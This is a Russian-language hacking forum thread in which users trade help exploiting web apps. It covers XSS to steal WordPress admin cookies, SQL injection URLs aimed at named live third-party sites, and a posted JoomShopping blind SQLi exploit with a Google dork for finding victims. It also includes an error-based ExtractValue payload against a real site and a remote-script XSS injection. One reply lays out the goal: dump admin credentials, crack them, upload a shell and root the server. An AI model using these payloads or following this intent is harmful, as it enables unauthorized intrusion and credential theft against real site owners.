Нужно проэксплоатировать xss, пока делаю на тестовом сайте у себя на денвере, дело в том, что с помощью js выводятся не все куки. var_dump($_COOKIE); выводит: array(3) { ["wordpress_test_cookie"]=> string(15) "WP Cookie check" ["wordpress_logged_in_6db1d63adbfd940870bdcece524b53b5"]=> string(49) "admin|1448819999|97ebc784204cf4131e6e5cbba0759665" ["wp-settings-time-1"]=> string(10) "1448647200" } а alert( document.cookie ); : wordpress_test_cookie=WP+Cookie+check; wp-settings-time-1=1448647200 Как получить с помощью JS все куки?
http://www.bindergroesswang.at/en/people/all/?no_cache=1&name=a')+order+by+110+--+&area=34 Как вывести? union select не катит((
Вопрос по vBulletin 4.0.x <= 4.1.2 - (search.php) SQL Inject Когда отсылаю POST запрос страница не перезагружается, почему ? Примичание: Обязательно должен выйти админ при поиске группы админов ? И влияет ли на эту ошибку версия движка ? Группу создал я. Это влияет или должна быть группа создана админом ? или пофиг ?
JoomShopping - Blind SQL Injection # Exploit Title: [JoomShopping Blind Sql injection] # Google Dork: [allinurl:"/modules/mod_jshopping_products_wfl/js/"] # Date: [2015-07-24] # Exploit Author: [Mormoroth] # Vendor Homepage: [http://www.webdesigner-profi.de] # Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html] # Version: [All] # Tested on: [Linux] ---------------------------- site/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a Кто-нибудь пробовал применять? Можно что-то из этого извлечь?
Из этого можно извлечь логин:пасс админский, разхешить, зайти в админку и залиться, порутать сервак, а потом извлекать пользу....
# Software Link: [http://www.webdesigner-profi.de/joomla-webdesign/joomla-shop/downloads.html] Где взять а то не робит ссылка
Либо я не до конца понимаю, либо у меня версии не сходятся. Установил на локалку 3.4 версию движка и скачал с официального сайта этот джумлашопинг. Вставляю так: test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a Spoiler: Открыть Получаю сообщение: if(typeof(jQuery) != 'undefined') {jQuery.noConflict();}window.addEvent('load',function(){wflSliders['wfls209 and 1=2-- a'] = new wflSlider({"ribbon_behavior":null,"duration":500,"effect_block":"single","id":"209 and 1=2-- a","orientation":"hor"})}); Вставляю вот так: Spoiler: Ещё посмотреть test.ru/modules/mod_jshopping_products_wfl/js/settings.php?id=209 and 1=2-- a' Получаю: Error displaying the error page: Application Instantiation Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''209 and 1=2-- a''' at line 3 SQL=SELECT params FROM bigmb_modules WHERE id='209 and 1=2-- a'' Получается, уязвимость присутствует и нужно лишь правильно составить запрос? Направьте в нужное русло пожалуйста.
Покажите конкретную площадку там и будем расуждать, тут походу ее еще как error разкрутить можно... P.S: вот вам живой пример как Error-based _ttp://www.moldesbarcelona.eu/modules/mod_jshopping_products_wfl/js/settings.php?id=171%27or(ExtractValue(1,(select%20concat_ws(0x3a,version()))))+--+ в гугле площадки для тестов по дорку inurl:mod_jshopping_products_wfl/
Все эксперименты провожу на локалке... Давайте залью на хостинг 3-ю джумлу и этот компонент - коллективно будем исследовать... Что скажете?
XSS: фильтра нету, Максимальное кол-во символов 32. Как сделать? Нахождение: Code: <td class="col-text"><p>[XSS] бла-бла-бла... Делал так, запрос идет, но не выполняется сам скрипт xss'ки. Проблема в </script> (его нету) Code: <script src=http://сайт>
Эм, получили "Error displaying the error page: Application Instantiation Error: XPATH syntax error:". А как полезное из этого что-то получить?